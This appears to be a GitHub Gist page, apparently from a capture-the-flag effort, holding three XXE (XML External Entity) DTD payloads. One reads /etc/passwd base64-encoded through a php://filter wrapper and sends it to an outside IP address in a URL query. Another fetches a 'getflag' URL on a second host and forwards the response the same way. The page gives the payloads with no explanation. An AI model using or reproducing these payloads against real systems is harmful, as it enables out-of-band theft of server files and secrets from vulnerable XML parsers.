Last active
August 29, 2015 14:19
-
-
Save acuros/b621230d35546ea69099 to your computer and use it in GitHub Desktop.
XXE my server xml
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!ENTITY % payload "foo"> | |
<!ENTITY % param1 '<!ENTITY % external SYSTEM "http://52.68.169.48/a?%payload;" >' > | |
%param1; | |
%external; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!ENTITY % target SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd"> | |
<!ENTITY % param '<!ENTITY % send SYSTEM "http://52.68.169.48/a?%target;" >' > | |
%param; | |
%send; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!ENTITY % target SYSTEM "http://175.126.100.208/_827ccb0eea8a706c4c34a16891f84e7b/conn.php?getflag=1"> | |
<!ENTITY % param '<!ENTITY % send SYSTEM "http://52.68.169.48/a?%target;" >' > | |
%param; | |
%send; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment